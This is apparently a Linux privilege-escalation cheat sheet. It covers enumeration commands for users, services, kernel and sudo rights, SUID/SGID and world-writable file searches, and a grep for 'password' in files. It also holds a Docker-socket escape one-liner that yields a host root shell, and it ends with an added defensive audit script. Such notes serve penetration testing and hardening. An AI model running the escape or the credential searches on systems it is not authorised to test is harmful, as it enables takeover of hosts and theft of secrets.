Privilege Escalation


  • Locate SUID/SGID files:

-perm /6000 -type f

-perm /6000 -user root -type f

(2000 = SGID, 4000 = SUID, 6000 = SUID+SGID; current GNU find uses /6000 where older versions accepted +6000)

  • Search by name:

-name '*.log'

  • Run commands on each item:

-exec grep 'password' {} \;

What's the OS? What version? What architecture?

  • cat /etc/*-release

  • uname -i

  • lsb_release -a (Debian based OSs)

Who are we? Where are we?

  • id

  • pwd

Who uses the box? What users? (And which ones have a valid shell)

  • cat /etc/passwd

  • grep -vE "nologin|false" /etc/passwd

What's currently running on the box? What active network services are there?

  • ps aux

  • netstat -antup

What's installed? What kernel is being used?

  • dpkg -l (Debian based OSs)

  • rpm -qa (CentOS / openSUSE)

  • uname -a

  • Search for files with full permissions (0777):

find / -type f -perm 0777 2>/dev/null

  • List binaries with sudo privileges:

sudo -l

  • Docker:

docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh
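As an added example (not part of the original page), the find predicates at the top of this page can be combined into two audit functions to run on your own hosts: one reports SUID/SGID files that are missing from a reviewed allowlist, the other lists log files containing the string 'password'. The function names and the allowlist format (one absolute path per line) are assumptions, and GNU find is assumed for -perm /6000 and -printf.

```shell
#!/bin/sh
# Added example: baseline audit built from the find predicates on this page.
# Assumptions: GNU find; the allowlist is a text file with one path per line;
# file names do not contain newlines.

# audit_setid DIR ALLOWLIST
# Prints "MODE OWNER PATH" for every regular file under DIR that has the SUID
# or SGID bit set and is NOT listed in ALLOWLIST. Empty output means no drift.
audit_setid() {
    dir=$1
    allow=$2
    # -xdev       stay on the starting filesystem (skips /proc, network mounts)
    # -perm /6000 match when SUID (4000) or SGID (2000) is set
    # -printf     octal mode, owner and path on one line
    find "$dir" -xdev -type f -perm /6000 -printf '%m %u %p\n' 2>/dev/null |
    while read -r mode owner path; do
        # -F fixed string, -x whole-line match, -q quiet: exact path lookup
        grep -Fxq -- "$path" "$allow" ||
            printf '%s %s %s\n' "$mode" "$owner" "$path"
    done | sort
}

# logs_with_password DIR
# Prints the names of *.log files under DIR that contain the string
# 'password', so credentials written to logs can be found and scrubbed.
logs_with_password() {
    dir=$1
    # The pattern is quoted so the shell cannot expand it before find sees it;
    # '{} +' batches file names into as few grep invocations as possible.
    find "$dir" -xdev -type f -name '*.log' \
        -exec grep -l -- 'password' {} + 2>/dev/null | sort
}

# Typical use (hypothetical allowlist path):
#   audit_setid / /etc/security/setid-allowlist.txt
#   logs_with_password /var/log
```

An allowlist can be seeded from a freshly installed, trusted system and reviewed whenever a package update changes the output.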

